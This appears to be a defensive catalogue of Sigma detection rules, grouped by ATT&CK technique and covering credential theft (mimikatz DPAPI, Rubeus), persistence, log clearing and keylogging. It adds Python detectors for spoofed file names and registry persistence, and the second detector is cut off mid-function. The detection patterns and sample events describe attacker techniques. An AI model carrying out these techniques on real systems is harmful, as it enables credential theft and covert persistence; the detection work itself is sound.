    Description: Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.
  • Startup/Logon Script Added to Group Policy Object - Level: medium
    Description: Detects the modification of Group Policy Objects (GPO) to add a startup/logon script to users or computer objects.
  • Modify Group Policy Settings - ScriptBlockLogging - Level: medium
    Description: Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.
  • Modify Group Policy Settings - Level: medium
    Description: Detects malicious GPO modifications, which can be used to implement many other malicious behaviors.
attack.t1559.001 4
  • DNS Query Request By Regsvr32.EXE - Level: medium
    Description: Detects DNS queries initiated by "Regsvr32.exe"
  • Network Connection Initiated By Regsvr32.EXE - Level: medium
    Description: Detects a network connection initiated by "Regsvr32.exe"
  • CMSTP Execution Process Access - Level: high
    Description: Detects various indicators of Microsoft Connection Manager Profile Installer execution
  • Dllhost.EXE Initiated Network Connection To Non-Local IP Address - Level: medium
    Description: Detects Dllhost.EXE initiating a network connection to a non-local IP address. Aside from Microsoft's own IP ranges, which need to be excluded, network communication from Dllhost will depend entirely on the hosted DLL. An initial baseline is recommended before deployment.
attack.t1555.004 4
  • Access To Windows Credential History File By Uncommon Applications - Level: medium
    Description: Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::credhist" function
  • Access To Windows DPAPI Master Keys By Uncommon Applications - Level: medium
    Description: Detects file access requests to the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. An example case would be usage of the mimikatz "dpapi::masterkey" function
  • Suspicious Key Manager Access - Level: high
    Description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager)
  • Windows Credential Manager Access via VaultCmd - Level: medium
    Description: Detects listing of credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe
attack.t1546.002 4
  • Suspicious Screensaver Binary File Creation - Level: medium
    Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
  • Writing Local Admin Share - Level: medium
    Description: Adversaries may interact with a remote network share using Server Message Block (SMB). This technique is used by post-exploitation frameworks.
  • Suspicious ScreenSave Change by Reg.exe - Level: medium
    Description: Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension
  • Path To Screensaver Binary Modified - Level: medium
    Description: Detects value modification of the registry key containing the path to the binary used as the screensaver.
attack.t1137.006 4
  • Potential Persistence Via Microsoft Office Add-In - Level: high
    Description: Detects potential persistence activity via startup add-ins that load when Microsoft Office starts (.wll/.xll are simply .dll fit for Word or Excel).
  • Code Executed Via Office Add-in XLL File - Level: high
    Description: Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system. Office add-ins can be used to add functionality to Office programs
  • Potential Persistence Via Excel Add-in - Registry - Level: high
    Description: Detects potential persistence via the creation of an Excel add-in (XLL) file to make it run automatically when Excel is started.
  • Potential Persistence Via Visual Studio Tools for Office - Level: medium
    Description: Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.
attack.t1550.003 4
  • Uncommon Outbound Kerberos Connection - Level: medium
    Description: Detects uncommon outbound network activity via Kerberos default port indicating possible lateral movement or first stage PrivEsc via delegation.
  • HackTool - Rubeus Execution - ScriptBlock - Level: high
    Description: Detects the execution of the hacktool Rubeus using specific command line flags
  • HackTool - KrbRelayUp Execution - Level: high
    Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced
  • HackTool - Rubeus Execution - Level: critical
    Description: Detects the execution of the hacktool Rubeus via PE information or command line parameters
attack.t1074.001 4
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell - Level: medium
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Module - Level: medium
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Zip A Folder With PowerShell For Staging In Temp - PowerShell Script - Level: medium
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
  • Folder Compress To Potentially Suspicious Output Via Compress-Archive Cmdlet - Level: medium
    Description: Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.
attack.t1132.001 4
  • Suspicious FromBase64String Usage On Gzip Archive - Ps Script - Level: medium
    Description: Detects attempts of decoding a base64 Gzip archive in a PowerShell script. This technique is often used as a method to load malicious content into memory afterward.
  • DNS Exfiltration and Tunneling Tools Execution - Level: high
    Description: Detects execution of well-known DNS exfiltration tools
  • Gzip Archive Decode Via PowerShell - Level: medium
    Description: Detects attempts of decoding encoded Gzip archives via PowerShell.
  • Suspicious FromBase64String Usage On Gzip Archive - Process Creation - Level: medium
    Description: Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward.
attack.t1070.005 4
Show Rules (4)
  • PowerShell Deleted Mounted Share - Level: medium
    Description: Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
  • Unmount Share Via Net.EXE - Level: low
    Description: Detects when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
  • Disable Administrative Share Creation at Startup - Level: medium
    Description: Administrative shares are hidden network shares created by Microsoft Windows NT operating systems that grant system administrators remote access to every disk volume on a network-connected system
  • MaxMpxCt Registry Value Changed - Level: low
    Description: Detects changes to the "MaxMpxCt" registry value. MaxMpxCt specifies the maximum outstanding network requests for the server per client, which is used when negotiating a Server Message Block (SMB) connection with a client. Note if the value is set beyond 125 older Windows 9x clients will fail to negotiate. Ransomware threat actors and operators (specifically BlackCat) were seen increasing this value in order to handle a higher volume of traffic.
attack.t1491.001 4
Show Rules (4)
  • Replace Desktop Wallpaper by Powershell - Level: low
    Description: An adversary may deface systems internal to an organization in an attempt to intimidate or mislead users. This may take the form of modifications to internal websites, or directly to user systems with the replacement of the desktop wallpaper
  • Potentially Suspicious Desktop Background Change Using Reg.EXE - Level: medium
    Description: Detects the execution of "reg.exe" to alter registry keys that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
  • Potentially Suspicious Desktop Background Change Via Registry - Level: medium
    Description: Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.
  • Potential Ransomware Activity Using LegalNotice Message - Level: high
    Description: Detects changes to the "LegalNoticeCaption" or "LegalNoticeText" registry values where the message set contains keywords often used in ransomware ransom messages
attack.t1546.007 4
Show Rules (4)
  • Potential Persistence Via Netsh Helper DLL - Level: medium
    Description: Detects the execution of netsh with "add helper" flag in order to add a custom helper DLL. This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
  • Potential Persistence Via Netsh Helper DLL - Registry - Level: medium
    Description: Detects changes to the Netsh registry key to add a new DLL value. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
  • New Netsh Helper DLL Registered From A Suspicious Location - Level: high
    Description: Detects changes to the Netsh registry key to add a new DLL value that is located on a suspicious location. This change might be an indication of a potential persistence attempt by adding a malicious Netsh helper
attack.t1547.010 4
Show Rules (4)
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
  • Add Port Monitor Persistence in Registry - Level: medium
    Description: Adversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.
  • Bypass UAC Using Event Viewer - Level: high
    Description: Bypasses User Account Control using Event Viewer and a relevant Windows Registry modification
  • Default RDP Port Changed to Non Standard Port - Level: high
    Description: Detects changes to the default RDP port. Remote desktop is a common feature in operating systems. It allows a user to log into a remote system using an interactive session with a graphical user interface. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).
attack.t1546.012 3
Show Rules (3)
  • SilentProcessExit Monitor Registration - Level: high
    Description: Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process
  • Potential Persistence Via App Paths Default Property - Level: high
    Description: Detects changes to the "Default" property for keys located under the \Software\Microsoft\Windows\CurrentVersion\App Paths\ registry key, which might be used as a method of persistence. The entries found under App Paths are used primarily for two purposes: first, to map an application's executable file name to that file's fully qualified path; second, to prepend information to the PATH environment variable on a per-application, per-process basis.
  • Potential Persistence Via GlobalFlags - Level: high
    Description: Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys
attack.t1059.009 3
Show Rules (3)
  • AWS IAM S3Browser Templated S3 Bucket Policy Creation - Level: high
    Description: Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of "".
  • AWS IAM S3Browser LoginProfile Creation - Level: high
    Description: Detects S3 Browser utility performing reconnaissance looking for existing IAM Users without a LoginProfile defined then (when found) creating a LoginProfile.
  • AWS IAM S3Browser User or AccessKey Creation - Level: high
    Description: Detects S3 Browser utility creating IAM User or AccessKey.
attack.t1098.001 3
Show Rules (3)
  • Added Credentials to Existing Application - Level: high
    Description: Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.
  • Github Outside Collaborator Detected - Level: medium
    Description: Detects when an organization member or an outside collaborator is added to or removed from a project board or has their permission level changed; when an owner removes an outside collaborator from an organization; or when two-factor authentication is required in an organization and an outside collaborator does not use 2FA or disables 2FA.
  • Okta Identity Provider Created - Level: medium
    Description: Detects when a new identity provider is created for Okta.
attack.t1027.001 3
Show Rules (3)
  • Binary Padding - Linux - Level: high
    Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to append junk data to a file.
  • Binary Padding - MacOS - Level: high
    Description: Adversaries may use binary padding to add junk data and change the on-disk representation of malware. This rule detects the use of dd and truncate to append junk data to a file.
  • Failed Code Integrity Checks - Level: informational
    Description: Detects code integrity failures such as missing page hashes or corrupted drivers due to unauthorized modification. This could be a sign of tampered binaries.
attack.t1056.001 3
Show Rules (3)
  • Linux Keylogging with Pam.d - Level: high
    Description: Detects attempts to enable auditing of TTY input via pam.d (pam_tty_audit), which records what users type at the terminal
  • Powershell Keylogging - Level: medium
    Description: Adversaries may log user keystrokes to intercept credentials as the user types them.
  • Potential Keylogger Activity - Level: medium
    Description: Detects PowerShell scripts that contain references to keystroke-capturing functions
attack.t1552.003 3
Show Rules (3)
  • Suspicious History File Operations - Linux - Level: medium
    Description: Detects commandline operations on shell history files
  • Suspicious History File Operations - Level: medium
    Description: Detects commandline operations on shell history files
  • Cisco Show Commands Input - Level: medium
    Description: Detects "show" commands used to see what other users have entered on the device; full credentials can be present in the command history
attack.t1070.002 3
Show Rules (3)
  • Clear Linux Logs - Level: medium
    Description: Detects attempts to clear logs on the system. Adversaries may clear system logs to hide evidence of an intrusion
  • Commands to Clear or Remove the Syslog - Level: high
    Description: Detects specific commands commonly used to remove or empty the syslog, which attackers often do to hide their tracks
  • Indicator Removal on Host - Clear Mac System Logs - Level: medium
    Description: Detects deletion of local audit logs
attack.t1592.004 3
Show Rules (3)
  • Cat Sudoers - Level: medium
    Description: Detects the execution of a cat /etc/sudoers to list all users that have sudo rights
  • Print History File Contents - Level: medium
    Description: Detects events in which someone prints the contents of history files to the commandline or redirects it to a file for reconnaissance
  • Linux Recon Indicators - Level: high
    Description: Detects events with patterns found in commands used for reconnaissance on linux systems
attack.t1078.001 3
Show Rules (3)
  • Root Account Enable Via Dsenableroot - Level: medium
    Description: Detects attempts to enable the root account via "dsenableroot"
  • Guest Account Enabled Via Sysadminctl - Level: low
    Description: Detects attempts to enable the guest account using the sysadminctl utility
  • Admin User Remote Logon - Level: low
    Description: Detects remote login by the Administrator user (depending on internal naming pattern).
attack.t1056.002 3
Show Rules (3)
  • GUI Input Capture - macOS - Level: low
    Description: Detects attempts to use system dialog prompts to capture user credentials
  • CredUI.DLL Loaded By Uncommon Process - Level: medium
    Description: Detects loading of "credui.dll" and related DLLs by an uncommon process. Attackers might leverage this DLL for potential use of "CredUIPromptForCredentials" or "CredUnPackAuthenticationBufferW".
  • PUA - Mouse Lock Execution - Level: medium
    Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents.
attack.t1497.001 3
Show Rules (3)
  • System Information Discovery Via Sysctl - MacOS - Level: medium
    Description: Detects the execution of "sysctl" with specific arguments that have been used by threat actors and malware. It provides system hardware information. This process is primarily used to detect and avoid virtualization and analysis environments.
  • System Information Discovery Using System_Profiler - Level: medium
    Description: Detects the execution of "system_profiler" with specific "Data Types" that have been seen being used by threat actors and malware. It provides system hardware and software configuration information. This process is primarily used for system information discovery. However, "system_profiler" can also be used to determine if virtualization software is being run for defense evasion purposes.
  • Powershell Detect Virtualization Environment - Level: medium
    Description: Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
attack.t1102.002 3
Show Rules (3)
  • Telegram Bot API Request - Level: medium
    Description: Detects suspicious DNS queries to api.telegram.org used by Telegram Bots of any kind
  • Telegram API Access - Level: medium
    Description: Detects suspicious requests to Telegram API without the usual Telegram User-Agent
  • Potentially Suspicious Azure Front Door Connection - Level: medium
    Description: Detects connections with Azure Front Door (known legitimate service that can be leveraged for C2) that fall outside of known benign behavioral baseline (not using common apps or common azurefd.net endpoints)
attack.t1547.004 3
Show Rules (3)
  • MITRE BZAR Indicators for Persistence - Level: medium
    Description: Windows DCE-RPC functions which indicate persistence techniques on the remote system. All credit for the Zeek mapping of the suspicious endpoint/operation field goes to MITRE.
  • Winlogon Helper DLL - Level: medium
    Description: Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software\[Wow6432Node\]Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalities that support Winlogon. Malicious modifications to these Registry keys may cause Winlogon to load and execute malicious DLLs and/or executables.
  • Winlogon Notify Key Logon Persistence - Level: high
    Description: Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete.
attack.t1499.004 3
Show Rules (3)
  • Apache Segmentation Fault - Level: high
    Description: Detects a segmentation fault error message caused by a crashing apache worker process
  • Nginx Core Dump - Level: high
    Description: Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.
  • Audit CVE Event - Level: critical
    Description: Detects events generated by user-mode applications when they call the CveEventWrite API because a known vulnerability is being exploited. Microsoft started using this log in January 2020 with CVE-2020-0601 (a Windows CryptoAPI vulnerability). Unfortunately, that is about the only instance of CVEs being written to this log.
attack.t1090.003 3
Show Rules (3)
  • Query Tor Onion Address - DNS Client - Level: high
    Description: Detects DNS resolution of an .onion address related to Tor routing networks
  • DNS Query Tor .Onion Address - Sysmon - Level: high
    Description: Detects DNS queries to an ".onion" address related to Tor routing networks
  • Tor Client/Browser Execution - Level: high
    Description: Detects the use of Tor or Tor-Browser to connect to onion routing networks
attack.t1505.002 3
Show Rules (3)
  • MSExchange Transport Agent Installation - Builtin - Level: medium
    Description: Detects the installation of an Exchange Transport Agent
  • Failed MSExchange Transport Agent Installation - Level: high
    Description: Detects a failed installation of an Exchange Transport Agent
  • MSExchange Transport Agent Installation - Level: medium
    Description: Detects the installation of an Exchange Transport Agent
attack.t1001.003 3
Show Rules (3)
  • Suspicious LDAP-Attributes Used - Level: high
    Description: Detects the usage of particular AttributeLDAPDisplayNames, which are known for data exchange via LDAP by the tool LDAPFragger and are additionally not commonly used in companies.
  • ADSI-Cache File Creation By Uncommon Tool - Level: medium
    Description: Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.
  • DNSCat2 Powershell Implementation Detection Via Process Creation - Level: high
    Description: The PowerShell implementation of DNSCat2 calls nslookup to craft queries. Counting nslookup processes spawned by PowerShell will show hundreds or thousands of instances if PS DNSCat2 is active locally.
attack.t1136.002 3
Show Rules (3)
  • Suspicious Windows ANONYMOUS LOGON Local Account Created - Level: high
    Description: Detects the creation of suspicious accounts similar to ANONYMOUS LOGON, such as using additional spaces. Created as a covering detection for the exclusion of Logon Type 3 from ANONYMOUS LOGON accounts.
  • PSEXEC Remote Execution File Artefact - Level: high
    Description: Detects creation of the PSEXEC key file, which is created every time a PsExec command is executed. It gets written to the file system and will be recorded in the USN Journal on the target system
  • Manipulation of User Computer or Group Security Principals Across AD - Level: medium
    Description: Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services, where access and permissions are configured across systems and services that are part of that domain.
attack.t1110.001 3
Show Rules (3)
  • Suspicious Rejected SMB Guest Logon From IP - Level: medium
    Description: Detects attempted PrintNightmare (CVE-2021-1675) remote code execution in the Windows Print Spooler service
  • Suspicious Connection to Remote Account - Level: low
    Description: Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism
  • HackTool - Hydra Password Bruteforce Execution - Level: high
    Description: Detects command line parameters used by Hydra password guessing hack tool
attack.t1055.012 3
Show Rules (3)
  • HackTool - CACTUSTORCH Remote Thread Creation - Level: high
    Description: Detects remote thread creation from CACTUSTORCH as described in references.
  • Potential Process Hollowing Activity - Level: medium
    Description: Detects when a memory process image does not match the disk image, indicative of process hollowing.
  • Potential Pikabot Hollowing Activity - Level: high
    Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries. The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
attack.t1036.007 3
Show Rules (3)
  • Suspicious Double Extension Files - Level: high
    Description: Detects dropped files with double extensions, which malware often uses to abuse the fact that Windows hides known file extensions by default.
  • Suspicious LNK Double Extension File Created - Level: medium
    Description: Detects the creation of files with an "LNK" as a second extension. This is sometimes used by malware as a method to abuse the fact that Windows hides the "LNK" extension by default.
  • Suspicious Parent Double Extension File Execution - Level: high
    Description: Detect execution of suspicious double extension files in ParentCommandLine
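An added example (not code from the Sigma project or from this report) of the name check behind the three double-extension rules above. It goes a step beyond them by also handling the right-to-left override trick listed later under attack.t1036.002, since both attacks rely on the same gap between the name Explorer renders and the extension Windows actually executes. The extension sets, the sample names and the verdict strings are assumptions for illustration.

```python
import os
from typing import List, Optional, Tuple

RLO = "\u202e"  # RIGHT-TO-LEFT OVERRIDE: text after it is rendered reversed

# Final extensions Windows will execute or that ShellExecute hands to an interpreter.
EXECUTABLE_EXT = {".exe", ".scr", ".pif", ".com", ".bat", ".cmd", ".vbs",
                  ".js", ".jse", ".wsf", ".ps1", ".hta", ".lnk"}
# "Inner" extensions an attacker picks so the hidden-extension name looks like a document/media file.
DOCUMENT_EXT = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".ppt", ".pptx",
                ".txt", ".rtf", ".jpg", ".jpeg", ".png", ".gif", ".mp3", ".mp4"}


def displayed_name(name: str) -> str:
    """What a Unicode-aware file browser shows: everything after the RLO mark is drawn reversed."""
    if RLO not in name:
        return name
    head, tail = name.split(RLO, 1)
    return head + tail[::-1]


def check_filename(name: str) -> Optional[str]:
    """Return a verdict for a spoofed file name, or None for an ordinary one."""
    real_ext = os.path.splitext(name)[1].lower()   # what Windows acts on

    if RLO in name:
        shown = displayed_name(name)
        shown_ext = os.path.splitext(shown)[1].lower()
        if real_ext in EXECUTABLE_EXT and shown_ext != real_ext:
            return f"rtlo-spoof: shown as {shown!r}, actually {real_ext}"
        return "rtlo-present"   # unusual in file names even when not spoofing an extension

    stem, ext = os.path.splitext(name)
    inner_ext = os.path.splitext(stem)[1].lower()
    if ext.lower() in EXECUTABLE_EXT and inner_ext in DOCUMENT_EXT:
        # With "Hide extensions for known file types" on, Explorer shows only `stem`,
        # and .lnk is hidden unconditionally.
        return f"double-extension: explorer shows {stem!r}, actually {ext.lower()}"
    return None


def scan_names(names: List[str]) -> List[Tuple[str, str]]:
    """Run the check over a list of file names (e.g. TargetFilename from file-create events)."""
    hits = []
    for n in names:
        verdict = check_filename(n)
        if verdict:
            hits.append((n, verdict))
    return hits


# Constructed sample names; not taken from any real incident.
SAMPLE_NAMES = [
    "quarterly-report.pdf",          # ordinary document
    "setup.exe",                     # ordinary executable
    "backup.tar.gz",                 # legitimate double extension, not executable
    "invoice.pdf.exe",               # classic: Explorer shows invoice.pdf
    "report.docx.lnk",               # .lnk is always hidden
    "photo" + RLO + "gnp.scr",       # rendered as photorcs.png, runs as .scr
]

if __name__ == "__main__":
    for name, verdict in scan_names(SAMPLE_NAMES):
        print(f"{name!r}: {verdict}")
```

When applying this to file-create or process-create telemetry, run it on the final path component only; a directory name containing a dot would otherwise be mistaken for an inner extension.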
attack.t1546.013 3
Show Rules (3)
  • PowerShell Profile Modification - Level: medium
    Description: Detects the creation or modification of a PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence
  • VsCode Powershell Profile Modification - Level: medium
    Description: Detects the creation or modification of a VS Code related PowerShell profile, which could indicate suspicious activity as the profile can be used as a means of persistence
  • Potential Persistence Via PowerShell User Profile Using Add-Content - Level: medium
    Description: Detects calls to "Add-Content" cmdlet in order to modify the content of the user profile and potentially adding suspicious commands for persistence
attack.t1556.002 3
Show Rules (3)
  • Powershell Install a DLL in System Directory - Level: high
    Description: Uses PowerShell to install/copy a file into a system directory such as "System32" or "SysWOW64"
  • Dropping Of Password Filter DLL - Level: medium
    Description: Detects dropping of dll files in system32 that may be used to retrieve user credentials from LSASS
  • Potential Suspicious Activity Using SeCEdit - Level: medium
    Description: Detects potentially suspicious behaviour using secedit.exe, such as exporting or modifying the security policy
attack.t1553.005 3
Show Rules (3)
  • Suspicious Invoke-Item From Mount-DiskImage - Level: medium
    Description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
  • Suspicious Mount-DiskImage - Level: low
    Description: Adversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
  • Suspicious Unblock-File - Level: medium
    Description: Detects use of Unblock-File to remove the Zone.Identifier alternate data stream, which marks a file as downloaded from the internet.
attack.t1564.003 3
Show Rules (3)
  • Suspicious PowerShell WindowStyle Option - Level: medium
    Description: Adversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
  • HackTool - Covenant PowerShell Launcher - Level: high
    Description: Detects suspicious command lines used in Covenant launchers
  • PUA - AdvancedRun Execution - Level: medium
    Description: Detects the execution of AdvancedRun utility
attack.t1546.001 3
Show Rules (3)
  • Change Default File Association Via Assoc - Level: low
    Description: Detects file association changes using the builtin "assoc" command. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
  • Change Default File Association To Executable Via Assoc - Level: high
    Description: Detects when a program changes the default file association of any extension to an executable. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility. Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.
  • Shell Open Registry Keys Manipulation - Level: high
    Description: Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)
attack.t1134.003 3
Show Rules (3)
  • HackTool - Impersonate Execution - Level: medium
    Description: Detects execution of the Impersonate tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively
  • HackTool - SharpImpersonation Execution - Level: high
    Description: Detects execution of the SharpImpersonation tool, which can be used to manipulate tokens on Windows computers remotely (PsExec/WmiExec) or interactively
  • HackTool - SharpDPAPI Execution - Level: high
    Description: Detects the execution of the SharpDPAPI tool based on CommandLine flags and PE metadata. SharpDPAPI is a C# port of some DPAPI functionality from the Mimikatz project.
attack.t1037.001 3
Show Rules (3)
  • Potential Persistence Via Logon Scripts - CommandLine - Level: high
    Description: Detects the addition of a new LogonScript to the registry value "UserInitMprLogonScript" for potential persistence
  • Uncommon Userinit Child Process - Level: high
    Description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence.
  • Potential Persistence Via Logon Scripts - Registry - Level: medium
    Description: Detects creation of "UserInitMprLogonScript" registry value which can be used as a persistence method by malicious actors
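Several of the registry-persistence groups above describe the same detection shape: a value set under a known autostart or hook key, escalated when the value points at a user-writable location. As an added example that is not code from the Sigma project or from this report, here is one watchlist-driven check over constructed Sysmon Event ID 13 (registry value set) records that covers the Netsh helper DLL rules (attack.t1546.007), the port monitor rule (attack.t1547.010), the GlobalFlags/SilentProcessExit and App Paths rules (attack.t1546.012), the Winlogon Shell/Userinit/Notify rules (attack.t1547.004) and the UserInitMprLogonScript rules (attack.t1037.001). The field names follow Sysmon (TargetObject, Details, Image); the key patterns, the "suspicious location" list, the levels and the sample events are assumptions for illustration rather than the Sigma rules' exact selections.

```python
import re
from typing import Dict, List, Optional, Tuple

# Constructed Sysmon Event ID 13 records (value set). Not real telemetry.
EVENTS: List[Dict[str, str]] = [
    # Netsh helper registered from System32 by netsh.exe itself: the noisy baseline
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\NetSh\ifmon",
     "Details": r"C:\Windows\System32\ifmon.dll",
     "Image": r"C:\Windows\System32\netsh.exe"},
    # Netsh helper pointing at a world-writable folder
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\NetSh\helper",
     "Details": r"C:\Users\Public\helper.dll",
     "Image": r"C:\Windows\System32\netsh.exe"},
    # Port monitor DLL registered by a binary running from C:\Windows\Temp
    {"TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\Evil Monitor\Driver",
     "Details": r"evil.dll",
     "Image": r"C:\Windows\Temp\stage.exe"},
    # Winlogon Shell extended with an extra executable from the user's profile
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell",
     "Details": r"explorer.exe, C:\Users\bob\AppData\Roaming\svc.exe",
     "Image": r"C:\Windows\regedit.exe"},
    # GlobalFlag 0x200 enables SilentProcessExit monitoring for notepad.exe ...
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe\GlobalFlag",
     "Details": r"DWORD (0x00000200)",
     "Image": r"C:\Windows\regedit.exe"},
    # ... and MonitorProcess names what runs when notepad.exe exits
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe\MonitorProcess",
     "Details": r"C:\Users\bob\AppData\Local\Temp\mon.exe",
     "Image": r"C:\Windows\regedit.exe"},
    # Logon script in the user's home directory (not in a location on the suspicious list)
    {"TargetObject": r"HKCU\Environment\UserInitMprLogonScript",
     "Details": r"C:\Users\bob\logon.bat",
     "Image": r"C:\Windows\System32\reg.exe"},
    # App Paths default value written by an installer
    {"TargetObject": r"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\(Default)",
     "Details": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "Image": r"C:\Program Files\Google\Chrome\Application\setup.exe"},
]

# (regex on TargetObject, technique, base level) for the keys the rules above cover.
WATCHLIST: List[Tuple[str, str, str]] = [
    (r"\\SOFTWARE\\Microsoft\\NetSh\\", "T1546.007", "medium"),
    (r"\\Control\\Print\\Monitors\\.+\\Driver$", "T1547.010", "medium"),
    (r"\\Windows NT\\CurrentVersion\\Winlogon\\(Shell|Userinit|Notify)", "T1547.004", "medium"),
    (r"\\Image File Execution Options\\.+\\GlobalFlag$", "T1546.012", "high"),
    (r"\\SilentProcessExit\\.+\\MonitorProcess$", "T1546.012", "high"),
    (r"\\Environment\\UserInitMprLogonScript$", "T1037.001", "medium"),
    (r"\\CurrentVersion\\App Paths\\.+\\\(Default\)$", "T1546.012", "high"),
]

# Locations a persistence DLL/EXE should rarely come from; presence escalates the level.
SUSPICIOUS_PATH = re.compile(
    r"(\\Users\\[^\\]+\\AppData\\|\\Users\\Public\\|\\Windows\\Temp\\|\\ProgramData\\|\\Temp\\|\\Downloads\\)",
    re.IGNORECASE)


def classify(event: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (technique, level) when the value set touches a watched key, else None.
    The level becomes 'high' when either the written value or the writing process
    lives in a user-writable location."""
    for pattern, technique, level in WATCHLIST:
        if re.search(pattern, event["TargetObject"], re.IGNORECASE):
            if SUSPICIOUS_PATH.search(event["Details"]) or SUSPICIOUS_PATH.search(event["Image"]):
                level = "high"
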